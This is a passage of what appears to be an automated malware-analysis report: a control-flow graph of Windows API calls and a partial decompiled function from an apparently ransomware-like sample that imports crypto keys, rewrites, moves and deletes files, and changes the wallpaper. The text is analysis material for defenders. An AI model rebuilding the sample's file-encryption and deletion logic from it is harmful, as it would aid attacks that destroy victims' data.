5656->5658 5656->5662 5660 4022a4 SetFilePointer WriteFile 5658->5660 5658->5662 5659 40234d 5661 402372 5659->5661 5665 404af0 4 API calls 5659->5665 5660->5662 5663 4022ce 5660->5663 5661->5662 5681 40a150 5661->5681 5662->5636 5663->5662 5664 4022db SetFilePointer SetEndOfFile 5663->5664 5667 402497 SetFileTime 5664->5667 5665->5661 5668 4024e0 _local_unwind2 5667->5668 5669 4024bc CloseHandle MoveFileW 5667->5669 5668->5636 5669->5668 5671 402477 SetFilePointerEx SetEndOfFile 5671->5667 5672 4023e0 ReadFile 5672->5662 5673 4023a7 5672->5673 5673->5662 5673->5671 5673->5672 5688 40b3c0 5673->5688 5677 404b04 EnterCriticalSection CryptDecrypt 5676->5677 5678 404afc 5676->5678 5679 404b3b LeaveCriticalSection 5677->5679 5680 404b2d LeaveCriticalSection 5677->5680 5678->5659 5679->5659 5680->5659 5682 40a184 5681->5682 5683 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5681->5683 5684 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5682->5684 5685 40a1bd 5682->5685 5683->5682 5684->5685 5686 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5685->5686 5687 40a1f6 5685->5687 5686->5687 5687->5673 5689 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5688->5689 5690 40b3ee 5688->5690 5689->5690 5691 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5690->5691 5699 40b410 5690->5699 5692 40b5ba 5694 40b0c0 4 API calls 5692->5694 5700 402424 WriteFile 5692->5700 5694->5692 5696 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5698 40b4ed 5696->5698 5697 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5697->5692 5698->5692 5698->5697 5698->5700 5707 40adc0 5698->5707 5699->5696 5699->5698 5699->5699 5699->5700 5701 40b0c0 5699->5701 5700->5662 5700->5673 5702 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5701->5702 5703 40b0ee 5701->5703 5702->5703 5706 40b114 5703->5706 5713 40a9d0 5703->5713 5706->5699 5708 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5707->5708 5709 40adee 5707->5709 5708->5709 5710 40ae14 5709->5710 5716 40a610 5709->5716 
5710->5698 5714 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5713->5714 5715 40a9ff 5713->5715 5714->5715 5715->5699 5717 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5716->5717 5718 40a63f 5716->5718 5717->5718 5718->5698 5719->5599 5720->5601 5738 4046b0 5721->5738 5723 4046f8 5724 404709 5723->5724 5725 4046fc 5723->5725 5727 404711 CryptImportKey 5724->5727 5728 40473e 5724->5728 5743 404770 5725->5743 5731 404760 5727->5731 5732 404731 5727->5732 5750 4049b0 CreateFileA 5728->5750 5731->5604 5733 404770 3 API calls 5732->5733 5735 404738 5733->5735 5734 40474c 5734->5731 5736 404770 3 API calls 5734->5736 5735->5604 5737 40475a 5736->5737 5737->5604 5739 4046b7 CryptAcquireContextA 5738->5739 5740 4046e0 5739->5740 5741 4046d7 5739->5741 5740->5723 5741->5739 5742 4046dd 5741->5742 5742->5723 5744 404788 5743->5744 5745 40477a CryptDestroyKey 5743->5745 5746 40479d 5744->5746 5747 40478f CryptDestroyKey 5744->5747 5745->5744 5748 404703 5746->5748 5749 4047a4 CryptReleaseContext 5746->5749 5747->5746 5748->5604 5749->5748 5751 404a1b _local_unwind2 5750->5751 5752 404a09 GetFileSize 5750->5752 5751->5734 5752->5751 5753 404a25 5752->5753 5753->5751 5755 404a38 GlobalAlloc 5753->5755 5755->5751 5756 404a49 ReadFile 5755->5756 5756->5751 5757 404a64 CryptImportKey 5756->5757 5757->5751 5758 404a81 _local_unwind2 5757->5758 5758->5734 5760 40c8f0 #823 5759->5760 5761 4026e4 5760->5761 5762 40c8f0 #823 5761->5762 5763 402706 swprintf FindFirstFileW 5762->5763 5764 40274d 5763->5764 5778 4027b4 5763->5778 5798 402e00 5764->5798 5766 40276a #825 5768 402e00 2 API calls 5766->5768 5767 4027d4 wcscmp 5770 40295d FindNextFileW 5767->5770 5771 4027ee wcscmp 5767->5771 5772 4027a0 #825 5768->5772 5769 402978 FindClose 5776 40298d 5769->5776 5780 4029b9 5769->5780 5770->5769 5770->5778 5771->5770 5773 402808 swprintf GetFileAttributesW 5771->5773 5775 402ace 5772->5775 5777 4028b6 wcscmp 5773->5777 5773->5778 5774 4029ef swprintf DeleteFileW swprintf DeleteFileW 
5781 402a6a #825 5774->5781 5782 402a4f 5774->5782 5775->5617 5776->5780 5788 402560 59 API calls 5776->5788 5777->5770 5779 4028d0 wcscmp 5777->5779 5778->5767 5778->5769 5778->5770 5791 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5778->5791 5804 402af0 _wcsnicmp 5778->5804 5779->5770 5784 4028e6 wcscmp 5779->5784 5780->5774 5790 4026b0 84 API calls 5780->5790 5786 402a94 5781->5786 5787 402aba #825 5781->5787 5793 402a66 5782->5793 5830 402e90 5782->5830 5784->5770 5789 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5784->5789 5786->5787 5795 402e90 2 API calls 5786->5795 5787->5775 5788->5776 5792 402da0 8 API calls 5789->5792 5790->5780 5826 402da0 #823 5791->5826 5796 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5792->5796 5793->5781 5795->5786 5796->5770 5799 402e7a 5798->5799 5803 402e10 5798->5803 5799->5766 5800 402e4c #825 5801 402e6d 5800->5801 5800->5803 5801->5766 5802 402e40 #825 5802->5800 5803->5800 5803->5802 5805 402b12 wcsstr 5804->5805 5806 402b1f 5804->5806 5805->5806 5807 402b30 _wcsicmp 5806->5807 5808 402be9 _wcsicmp 5806->5808 5811 402b42 5807->5811 5812 402b4d _wcsicmp 5807->5812 5809 402c07 _wcsicmp 5808->5809 5810 402bfc 5808->5810 5813 402c21 _wcsicmp 5809->5813 5814 402c16 5809->5814 5810->5778 5811->5778 5815 402b67 _wcsicmp 5812->5815 5816 402b5c 5812->5816 5813->5778 5814->5778 5817 402b81 _wcsicmp 5815->5817 5818 402b76 5815->5818 5816->5778 5819 402b90 5817->5819 5820 402b9b _wcsicmp 5817->5820 5818->5778 5819->5778 5821 402bb5 wcsstr 5820->5821 5822 402baa 5820->5822 5823 402bc4 5821->5823 5824 402bcf wcsstr 5821->5824 5822->5778 5823->5778 5824->5808 5825 402bde 5824->5825 5825->5778 5827 402dbf 5826->5827 5835 402f10 5827->5835 5829 402de4 
5829->5796 5831 402ed0 #825 5830->5831 5832 402eb1 5830->5832 5831->5782 5833 402ec4 #825 5832->5833 5834 402ebd 5832->5834 5833->5831 5834->5831 5836 402f40 5835->5836 5843 403044 5835->5843 5837 402f68 5836->5837 5842 402fdb 5836->5842 5839 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5837->5839 5840 402f6e ?_Xran@std@ 5837->5840 5838 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5838->5843 5844 402f85 5839->5844 5840->5839 5841 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5841->5829 5842->5838 5845 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5842->5845 5843->5829 5844->5841 5846 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5844->5846 5847 403006 5845->5847 5846->5841 5848 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5846->5848 5847->5829 5848->5841 5850 404770 3 API calls 5849->5850 5851 401fac 5850->5851 5852 404770 3 API calls 5851->5852 5853 401fb4 5852->5853 5853->5853 5855 401fe3 5853->5855 5856 401fd0 GlobalFree 5853->5856 5854 40200c 5854->5621 5855->5854 5857 401ff9 GlobalFree 5855->5857 5856->5855 5857->5854 5858->5623 5859->5625 6112 403560 6113 40358c #4376 6112->6113 6114 40356e GetExitCodeThread 6112->6114 6115 403593 6113->6115 6114->6113 6114->6115 6510 40db60 send 6511 409f60 RectVisible 6512 401760 #6453 6513 401791 WaitForSingleObject TerminateThread CloseHandle 6512->6513 6514 4017b8 6512->6514 6513->6514 6515 40193e 6514->6515 6516 4018f6 6514->6516 6517 4017d8 sprintf fopen 6514->6517 6518 401915 6516->6518 6521 401903 rand 6516->6521 6519 401834 8 API calls 6517->6519 6520 4018da #1200 6517->6520 6518->6515 6522 401939 #1200 6518->6522 6519->6515 6520->6515 6521->6518 6522->6515 5860 40a070 DrawTextA 5861 404070 #693 5862 404088 5861->5862 5863 40407f #825 5861->5863 5863->5862 6117 408d70 6118 408e09 GetDeviceCaps 6117->6118 6120 
408eb0 6118->6120 6126 408ed8 6118->6126 6121 408eba GetDeviceCaps GetDeviceCaps 6120->6121 6120->6126 6121->6126 6122 4090b6 #2414 6123 408f51 _ftol _ftol 6123->6126 6124 408fca _ftol _ftol _ftol 6125 409024 CreateSolidBrush #1641 6124->6125 6124->6126 6125->6126 6126->6122 6126->6123 6126->6124 6127 409048 FillRect #2414 6126->6127 6128 409083 #2754 6126->6128 6127->6126 6128->6126 6246 404670 6251 404690 DeleteCriticalSection 6246->6251 6248 404678 6249 404688 6248->6249 6250 40467f #825 6248->6250 6250->6249 6251->6248 6523 409b70 #2379 6530 403f70 6535 403f90 #2414 6530->6535 6532 403f78 6533 403f88 6532->6533 6534 403f7f #825 6532->6534 6534->6533 6535->6532 6536 404f70 #4476 6537 404f91 6536->6537 6538 404fc7 #3089 6536->6538 6537->6538 6539 404f9b 6537->6539 6252 403271 #2302 #2302 6253 406a00 #4476 6254 406a23 6253->6254 6256 406a62 6253->6256 6255 406a38 #3089 6254->6255 6254->6256 6255->6256 6257 406a46 #3089 6255->6257 6257->6256 6258 406a54 #3089 6257->6258 6258->6256 6259 401600 6260 4016e5 6259->6260 6261 40161a 6259->6261 6262 4016e9 #537 6260->6262 6266 4016de 6260->6266 6263 40161d 6261->6263 6264 40168f 6261->6264 6282 401970 #3092 #6199 #800 6262->6282 6268 401743 #2385 6263->6268 6271 401628 #537 6263->6271 6272 40165e 6263->6272 6265 401693 #537 6264->6265 6264->6266 6281 401970 #3092 #6199 #800 6265->6281 6266->6268 6270 401701 SendMessageA #2385 6279 401970 #3092 #6199 #800 6271->6279 6272->6266 6275 401663 #537 6272->6275 6273 4016ab SendMessageA #2385 6280 401970 #3092 #6199 #800 6275->6280 6276 401640 #2385 6278 40167b #2385 6279->6276 6280->6278 6281->6273 6282->6270 6540 403f00 6545 403f20 #2414 6540->6545 6542 403f08 6543 403f18 6542->6543 6544 403f0f #825 6542->6544 6544->6543 6545->6542 5531 413102 __set_app_type __p__fmode __p__commode 5532 413171 5531->5532 5533 413185 5532->5533 5534 413179 __setusermatherr 5532->5534 5543 4133b2 _controlfp 5533->5543 5534->5533 5536 41318a _initterm __getmainargs _initterm 5537 4131de 
GetStartupInfoA 5536->5537 5539 413212 GetModuleHandleA 5537->5539 5544 4133e6 #1576 5539->5544 5542 413236 exit _XcptFilter 5543->5536 5544->5542 5872 404410 SetCursor 5864 403810 WideCharToMultiByte 5867 403e60 SendMessageA #3998 SendMessageA 5864->5867 5866 403845 5867->5866 5868 403410 #4476 5869 403454 #3089 5868->5869 5870 403431 5868->5870 5871 40343b 5869->5871 5870->5869 5870->5871 6129 401110 #2302 6546 404310 6547 404333 6546->6547 6548 40433a #470 #5789 #5875 #6172 6546->6548 6549 4044c0 7 API calls 6547->6549 6550 40438a #5789 #755 6548->6550 6549->6548 6551 401f10 6552 401f30 6 API calls 6551->6552 6553 401f18 6552->6553 6554 401f28 6553->6554 6555 401f1f #825 6553->6555 6555->6554 6289 40ca19 6290 40ca26 6289->6290 6291 40ca28 #823 6289->6291 6290->6291 6134 409920 6139 4098c0 6134->6139 6137 409938 6138 40992f #825 6138->6137 6140 4098f2 #5875 6139->6140 6141 4098fb 6139->6141 6140->6141 6141->6137 6141->6138 6301 405a20 6302 405a25 6301->6302 6305 4130bb 6302->6305 6308 41308f 6305->6308 6307 405a4a 6309 4130a4 __dllonexit 6308->6309 6310 413098 _onexit 6308->6310 6309->6307 6310->6307 5874 409c20 #3797 5875 409c40 #6734 5874->5875 5876 409c36 5874->5876 5877 409c5b SendMessageA 5875->5877 5878 409c78 5875->5878 5877->5878 5879 409ce4 5878->5879 5880 409caa 5878->5880 5881 409cf6 5879->5881 5882 409ce8 InvalidateRect 5879->5882 5883 409cd4 #4284 5880->5883 5884 409cc4 #4284 5880->5884 5882->5881 5883->5881 5884->5881 6292 401220 6293 4012c2 #2379 6292->6293 6294 401233 6292->6294 6295 401243 SendMessageA KillTimer #4853 6294->6295 6296 40126b SendMessageA 6294->6296 6295->6296 6297 401285 SendMessageA 6296->6297 6298 401297 6296->6298 6297->6298 6298->6293 6299 4012a1 SendMessageA 6298->6299 6299->6293 6300 4012b8 6299->6300 6300->6293 6319 404620 #795 6320 404638 6319->6320 6321 40462f #825 6319->6321 6321->6320 5873 40a020 TabbedTextOutA 5885 408c20 5890 408b40 5885->5890 5887 408c28 5888 408c38 5887->5888 5889 408c2f #825 5887->5889 5889->5888 
5891 408bd0 5890->5891 5892 408b78 BitBlt 5890->5892 5894 408bd6 #2414 #640 5891->5894 5895 408bc1 #5785 5892->5895 5896 408bb5 #5785 5892->5896 5894->5887 5895->5894 5896->5894 6311 409a20 6316 4099c0 6311->6316 6314 409a38 6315 409a2f #825 6315->6314 6317 409a03 6316->6317 6318 4099f3 #6170 6316->6318 6317->6314 6317->6315 6318->6317 6560 409b20 6561 409b31 6560->6561 6562 409b33 #6140 6560->6562 6561->6562 5897 413427 5898 41342c 5897->5898 5901 4133fe #1168 5898->5901 5902 413421 5901->5902 5903 413418 _setmbcp 5901->5903 5903->5902 5907 407c30 OpenClipboard 5908 407c42 GlobalAlloc 5907->5908 5909 407ca9 5907->5909 5910 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5908->5910 5911 407c5b CloseClipboard 5908->5911 5910->5909 6143 402d30 6144 402d73 #825 6143->6144 6145 402d3f 6143->6145 6146 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6145->6146 6146->6146 6147 402d72 6146->6147 6147->6144 5904 40d830 inet_addr 5905 40d844 gethostbyname 5904->5905 5906 40d84f 5904->5906 5905->5906 5912 404430 5913 40447b 5912->5913 5914 40443d _TrackMouseEvent #2379 5912->5914 5917 404489 5913->5917 5919 404530 5913->5919 5918 4044a1 SetCursor #2379 5917->5918 5920 4045c1 5919->5920 5921 404552 5919->5921 5920->5917 5921->5920 5922 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5921->5922 5922->5920 6142 406930 #6215 6322 405230 6329 405369 6322->6329 6332 40525a 6322->6332 6323 405552 InvalidateRect 6328 405560 6323->6328 6324 405285 6325 4052ee 7 API calls 6324->6325 6326 40528f #4277 #923 #858 #800 #800 6324->6326 6325->6323 6326->6323 6327 40539e 6330 405430 6327->6330 6331 4053aa 7 API calls 6327->6331 6329->6323 6329->6327 6336 405390 #940 6329->6336 6333 4054b4 6330->6333 6334 405435 7 API calls 6330->6334 6331->6323 6332->6324 6335 405277 #940 6332->6335 6337 4054b8 6333->6337 6339 405503 6333->6339 6334->6323 6335->6324 6335->6335 6336->6327 6336->6336 6337->6323 6338 4054de #6778 #6648 
6337->6338 6338->6338 6340 405501 6338->6340 6339->6323 6339->6328 6341 405529 #6778 #6648 6339->6341 6340->6323 6341->6323 6341->6341 6342 40d630 6347 40d650 6342->6347 6344 40d638 6345 40d648 6344->6345 6346 40d63f #825 6344->6346 6346->6345 6348 40dad0 4 API calls 6347->6348 6349 40d680 6348->6349 6349->6344 6148 402531 6149 402543 6148->6149 6150 40253c CloseHandle 6148->6150 6151 402555 6149->6151 6152 40254e CloseHandle 6149->6152 6150->6149 6152->6151 6350 40ca3a 6353 40ca40 6350->6353 6351 40ca81 6352 40ca87 #825 6352->6351 6353->6351 6353->6352 5923 4068c0 #4837 6354 4032c0 6 API calls 6355 403334 SendMessageA #3092 6354->6355 6357 40335c SendMessageA #3092 6355->6357 6359 40337b SendMessageA #3092 6357->6359 6361 4033a0 SendMessageA 6359->6361 6362 40339d 6359->6362 6365 403cb0 FindFirstFileA 6361->6365 6362->6361 6364 4033b2 SendMessageA #3996 SendMessageA 6366 403cd9 6365->6366 6367 403ce3 6365->6367 6366->6364 6368 403e1f FindNextFileA 6367->6368 6370 403d14 sscanf 6367->6370 6368->6367 6369 403e3a FindClose 6368->6369 6369->6364 6370->6368 6371 403d38 fopen 6370->6371 6371->6368 6372 403d5c fread 6371->6372 6373 403e15 fclose 6372->6373 6377 403d7b 6372->6377 6373->6368 6374 403d8f sprintf 6375 403dd4 SendMessageA #823 SendMessageA 6374->6375 6375->6373 6377->6373 6377->6374 6377->6375 6378 401c30 inet_ntoa 6377->6378 6378->6377 6563 4043c0 #6453 #2414 6564 409fc0 TextOutA 5924 404cd0 5929 404cf0 #2414 #2414 #800 #641 5924->5929 5926 404cd8 5927 404ce8 5926->5927 5928 404cdf #825 5926->5928 5928->5927 5929->5926 4642 4064d0 #4710 SendMessageA SendMessageA 4686 401c70 wcscat 4642->4686 4644 406516 4645 406577 4644->4645 4646 40651d GetModuleFileNameA strrchr 4644->4646 4695 401a10 4645->4695 4647 40656c SetCurrentDirectoryA 4646->4647 4648 40655d strrchr 4646->4648 4647->4645 4648->4647 4650 406585 4651 4065e5 4650->4651 4652 40658c time 4650->4652 4705 402c40 4651->4705 4653 401a10 5 API calls 4652->4653 4653->4651 4655 4065ed __p___argc 4656 406606 
4655->4656 4657 40678c 4656->4657 4658 40660f __p___argv 4656->4658 4753 407e80 SHGetFolderPathW wcslen 4657->4753 4660 406621 4658->4660 4663 406661 __p___argv 4660->4663 4664 406652 4660->4664 4661 406793 SetWindowTextW 4756 406f80 4661->4756 4667 40666d 4663->4667 4724 407f80 fopen 4664->4724 4665 4067a9 4814 406c20 GetUserDefaultLangID GetLocaleInfoA 4665->4814 4671 4066ad __p___argv 4667->4671 4672 40669e 4667->4672 4670 4067b0 SetTimer SetTimer 4674 4066b9 4671->4674 4734 4080c0 FindFirstFileA 4672->4734 4674->4657 4676 4066ee Sleep 4674->4676 4711 401bb0 AllocateAndInitializeSid 4676->4711 4678 406734 4679 406750 sprintf 4678->4679 4680 406738 4678->4680 4716 401a90 CreateProcessA 4679->4716 4752 401b50 ShellExecuteExA 4680->4752 4683 40674b 4685 406784 ExitProcess 4683->4685 4684 406781 4684->4685 4688 401cdc 4686->4688 4687 401d00 RegCreateKeyW 4687->4688 4688->4687 4689 401d62 RegQueryValueExA 4688->4689 4690 401d1d GetCurrentDirectoryA RegSetValueExA 4688->4690 4691 401dbb 4688->4691 4692 401d9e RegCloseKey 4689->4692 4693 401d90 SetCurrentDirectoryA 4689->4693 4690->4692 4691->4644 4692->4688 4694 401dc8 4692->4694 4693->4692 4694->4644 4696 401a1a fopen 4695->4696 4698 401a3a 4696->4698 4699 401a6f 4696->4699 4700 401a53 fwrite 4698->4700 4701 401a46 fread 4698->4701 4699->4650 4702 401a5e 4700->4702 4701->4702 4703 401a74 fclose 4702->4703 4704 401a66 fclose 4702->4704 4703->4650 4704->4699 4823 404b70 4705->4823 4707 402c46 4708 402c57 4707->4708 4709 402c5e LoadLibraryA 4707->4709 4708->4655 4709->4708 4710 402c73 7 API calls 4709->4710 4710->4708 4712 401bf6 4711->4712 4713 401bfb CheckTokenMembership 4711->4713 4712->4678 4714 401c10 4713->4714 4715 401c14 FreeSid 4713->4715 4714->4715 4715->4678 4717 401b45 4716->4717 4718 401aed 4716->4718 4717->4684 4719 401af5 WaitForSingleObject 4718->4719 4720 401b26 CloseHandle CloseHandle 4718->4720 4721 401b12 4719->4721 4722 401b05 TerminateProcess 4719->4722 4720->4684 4721->4720 4723 401b1a 
GetExitCodeProcess 4721->4723 4722->4721 4723->4720 4725 407fd0 fread fclose 4724->4725 4733 406659 ExitProcess 4724->4733 4828 40be90 strncpy strncpy strncpy 4725->4828 4727 408002 4829 40c4f0 4727->4829 4729 40801d 4730 40c4f0 112 API calls 4729->4730 4731 408041 4729->4731 4730->4731 4732 401a10 5 API calls 4731->4732 4731->4733 4732->4733 4735 40820a 4734->4735 4747 408124 4734->4747 5288 401e30 4735->5288 4738 4081e4 FindNextFileA 4739 4081ff FindClose 4738->4739 4738->4747 4739->4735 4740 401e30 2 API calls 4742 408255 sprintf #537 4740->4742 4741 408158 sscanf 4741->4738 4743 408178 fopen 4741->4743 5293 4082c0 4742->5293 4743->4738 4745 408190 fread 4743->4745 4745->4747 4748 4081bd fclose 4745->4748 4747->4738 4747->4741 4747->4748 4748->4738 4748->4747 4749 408291 #537 4751 4082c0 141 API calls 4749->4751 4750 4066a5 ExitProcess 4751->4750 4752->4683 4754 407f02 4753->4754 4755 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4753->4755 4754->4661 4755->4661 5350 4076a0 4756->5350 4758 406fa8 27 API calls 4759 407119 4758->4759 4760 40711c SendMessageA #3092 4758->4760 4759->4760 4761 40713d SendMessageA #3092 4760->4761 4763 40715f SendMessageA #3092 4761->4763 4765 407181 SendMessageA #3092 4763->4765 4767 4071a3 SendMessageA #3092 4765->4767 4769 4071c5 SendMessageA #3092 4767->4769 4771 4071e7 4769->4771 4772 4071ea SendMessageA #3092 4769->4772 4771->4772 4773 407205 SendMessageA #3092 4772->4773 4775 407227 SendMessageA #3092 4773->4775 4777 407249 SendMessageA #3092 4775->4777 4779 40726b 4777->4779 4780 40726e SendMessageA #860 4777->4780 4779->4780 4781 4072a4 4780->4781 4782 4072ed #537 4781->4782 5366 404210 #858 #800 4782->5366 4784 407309 #537 5367 404210 #858 #800 4784->5367 4786 407325 #540 #2818 #535 5368 404210 #858 #800 4786->5368 4788 407369 5369 404270 4788->5369 4792 4073a8 SendMessageA SendMessageA #6140 #6140 4793 407428 4792->4793 5373 405920 4793->5373 4797 407457 5381 4058c0 4797->5381 4799 407460 5384 405180 
_mbscmp 4799->5384 4801 407477 4802 405920 2 API calls 4801->4802 4803 4074ac 4802->4803 4804 405860 2 API calls 4803->4804 4805 4074b5 4804->4805 4806 4058c0 2 API calls 4805->4806 4807 4074be 4806->4807 4808 405180 4 API calls 4807->4808 4809 4074d5 GetTimeZoneInformation 4808->4809 5390 401e60 VariantTimeToSystemTime 4809->5390 4811 407508 SystemTimeToTzSpecificLocalTime #2818 5391 401e60 VariantTimeToSystemTime 4811->5391 4813 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4813->4665 4815 406c81 SendMessageA 4814->4815 4816 406c5d 4814->4816 4817 406cc1 SendMessageA 4815->4817 4818 406ca1 SendMessageA 4815->4818 4816->4815 4820 406ae0 27 API calls 4817->4820 5398 406ae0 8 API calls 4818->5398 4821 406cdd 4820->4821 4821->4670 4822 406cba 4822->4670 4824 404b81 LoadLibraryA 4823->4824 4825 404b7a 4823->4825 4826 404b96 6 API calls 4824->4826 4827 404bf6 4824->4827 4825->4707 4826->4827 4827->4707 4828->4727 4830 40c50f 4829->4830 4843 40bed0 4830->4843 4832 40c54b 4833 40c596 4832->4833 4862 40dd00 4832->4862 4865 40dbf0 4833->4865 4836 40c5e7 4836->4729 4837 40c568 4837->4833 4838 40c600 4837->4838 4839 40c635 4838->4839 4840 40c617 strncpy 4838->4840 4841 40dbf0 free 4839->4841 4840->4839 4842 40c650 4841->4842 4842->4729 4844 40bef5 4843->4844 4845 40bf0a #823 4843->4845 4844->4845 4846 40bf2e 4845->4846 4847 40bf27 4845->4847 4849 40bf46 4846->4849 4873 40baf0 4846->4873 4869 40d5e0 4847->4869 4849->4832 4852 40bf72 4852->4832 4853 40bf8a GetComputerNameA GetUserNameA 4905 40dc00 4853->4905 4856 40dd00 4 API calls 4857 40c01f 4856->4857 4858 40dc00 4 API calls 4857->4858 4859 40c038 4858->4859 4860 40dd00 4 API calls 4859->4860 4861 40c047 4860->4861 4861->4832 4863 40dc00 4 API calls 4862->4863 4864 40dd1c 4863->4864 4864->4837 4866 40dd70 4865->4866 4867 40dd8b 4866->4867 5284 412ac0 4866->5284 4867->4836 4870 40d602 4869->4870 4914 40dad0 4870->4914 4917 40ba10 4873->4917 4875 40bdf5 4875->4852 4875->4853 4876 40bb14 4876->4875 4877 40bb42 
4876->4877 4922 40ba60 4876->4922 4877->4875 4926 40c8f0 #823 4877->4926 4881 40bc1b strtok 4885 40bc30 4881->4885 4896 40bbb7 4881->4896 4882 40ba60 closesocket 4884 40bc8b 4882->4884 4886 40bc92 4884->4886 4887 40bcec GetTickCount srand 4884->4887 4885->4882 4885->4887 4948 40c860 4886->4948 4890 40bdc7 4887->4890 4891 40bd07 rand 4887->4891 4893 40c860 2 API calls 4890->4893 4901 40bd1e 4891->4901 4892 40bcd8 #825 4892->4875 4895 40bde8 #825 4893->4895 4895->4875 4896->4881 4898 40c7b0 #825 4896->4898 4928 40c7b0 4896->4928 4932 40c920 4896->4932 4944 40c800 #823 4896->4944 4897 40ba60 closesocket 4897->4901 4898->4881 4899 40be75 #825 4899->4875 4900 40be11 4900->4899 4960 40c740 4900->4960 4901->4897 4901->4900 4954 40ce50 4901->4954 4906 40dc15 4905->4906 4912 40c013 4905->4912 4907 40dc77 4906->4907 4908 40dc49 4906->4908 4906->4912 5283 412aa0 realloc 4907->5283 5282 412a90 malloc 4908->5282 4911 40dc51 4911->4912 4913 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4911->4913 4912->4856 4913->4912 4915 40d61e 4914->4915 4916 40dadf setsockopt send shutdown closesocket 4914->4916 4915->4846 4916->4915 4918 40ba27 4917->4918 4919 40ba2b 4918->4919 4965 40b840 sprintf GetFileAttributesA 4918->4965 4919->4876 4921 40ba31 4921->4876 4923 40ba88 4922->4923 5218 40d8c0 4923->5218 4927 40bb62 strtok 4926->4927 4927->4885 4927->4896 4929 40c7d0 4928->4929 4930 40c7bb 4928->4930 4929->4896 4930->4929 4931 40c7d6 #825 4930->4931 4931->4929 4933 40c932 4932->4933 4934 40c92d ?_Xlen@std@ 4932->4934 4935 40c973 4933->4935 4936 40c963 4933->4936 4937 40c946 4933->4937 4934->4933 4940 40c990 4935->4940 4941 40c7b0 #825 4935->4941 4938 40c7b0 #825 4936->4938 4942 40c94a 4937->4942 5222 40c9c0 4937->5222 4939 40c96c 4938->4939 4939->4896 4940->4896 4941->4937 4942->4896 4945 40c81f 4944->4945 5228 40cad0 4945->5228 4947 40c844 4947->4896 4949 40c8d9 4948->4949 4951 40c870 4948->4951 4949->4892 4950 40c8ab #825 4950->4951 4953 40c8cc 4950->4953 4951->4950 4952 40c8a2 #825 

                                                      Control-flow Graph

                                                      C-Code - Quality: 71%
                                                      			E004064D0(intOrPtr __ecx, void* __fp0) {
                                                      				char _v1032;
                                                      				char _v1424;
                                                      				void _v2256;
                                                      				void _v2456;
                                                      				void _v2707;
                                                      				char _v2708;
                                                      				intOrPtr _v2720;
                                                      				short _v2724;
                                                      				int _t48;
                                                      				int _t49;
                                                      				intOrPtr* _t50;
                                                      				intOrPtr _t60;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t66;
                                                      				short _t70;
                                                      				void* _t82;
                                                      				char* _t87;
                                                      				char* _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t98;
                                                      				intOrPtr _t99;
                                                      				intOrPtr _t100;
                                                      				intOrPtr _t105;
                                                      				char _t122;
                                                      				intOrPtr _t134;
                                                      				intOrPtr _t135;
                                                      				intOrPtr _t136;
                                                      				intOrPtr* _t140;
                                                      				intOrPtr* _t141;
                                                      				intOrPtr* _t142;
                                                      				intOrPtr* _t161;
                                                      				intOrPtr* _t162;
                                                      				intOrPtr* _t163;
                                                      				void* _t165;
                                                      				void* _t167;
                                                      				intOrPtr* _t168;
                                                      				void* _t169;
                                                      				void* _t170;
                                                      				void* _t171;
                                                      				void* _t201;
                                                      
                                                      				_t201 = __fp0;
                                                      				_t90 = __ecx; // executed
                                                      				L00412CB0(); // executed
                                                      				SendMessageA( *(__ecx + 0x20), 0x80, 1,  *(__ecx + 0x82c)); // executed
                                                      				SendMessageA( *(_t90 + 0x20), 0x80, 0,  *(_t90 + 0x82c)); // executed
                                                      				_t48 = E00401C70(0);
                                                      				_t170 = _t169 + 4;
                                                      				if(_t48 == 0) {
                                                      					_t122 =  *0x421798; // 0x0
                                                      					_v2708 = _t122;
                                                      					memset( &_v2707, _t48, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetModuleFileNameA(0,  &_v2708, 0x104);
                                                      					_t87 = strrchr( &_v2708, 0x5c);
                                                      					_t170 = _t170 + 0x14;
                                                      					if(_t87 != 0) {
                                                      						_t89 = strrchr( &_v2708, 0x5c);
                                                      						_t170 = _t170 + 8;
                                                      						 *_t89 = 0;
                                                      					}
                                                      					SetCurrentDirectoryA( &_v2708);
                                                      				}
                                                      				_t167 = _t90 + 0x50c;
                                                      				_t49 = E00401A10(_t167, 1);
                                                      				_t171 = _t170 + 8;
                                                      				if(_t49 == 0) {
                                                      					memset(_t167, _t49, 0xc3 << 2);
